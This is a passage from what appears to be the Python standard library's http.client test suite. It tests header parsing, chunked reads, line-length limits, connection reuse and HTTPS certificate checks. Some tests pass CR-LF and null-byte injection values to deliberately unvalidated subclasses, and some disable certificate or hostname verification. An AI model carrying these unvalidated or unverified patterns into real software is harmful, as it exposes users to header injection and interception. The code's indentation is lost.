for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_header_limit_after_100(self):
body = (
'HTTP/1.1 100 OK\r\n'
'r\n' * 32768
)
resp = client.HTTPResponse(FakeSocket(body))
with self.assertRaises(client.HTTPException) as cm:
resp.begin()
# We must assert more because other reasonable errors that we
# do not want can also be HTTPException derived.
self.assertIn('got more than ', str(cm.exception))
self.assertIn('headers', str(cm.exception))
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test httpresponse with no \r\n termination,
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
threading = support.import_module("threading")
serv = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.addCleanup(serv.close)
serv.bind((HOST, 0))
serv.listen()
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # Allowlist documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
# from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
# import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
# import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with support.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
# import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
h.request('GET', '/')
resp = h.getresponse()
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
# import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
# import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
# import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
# import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
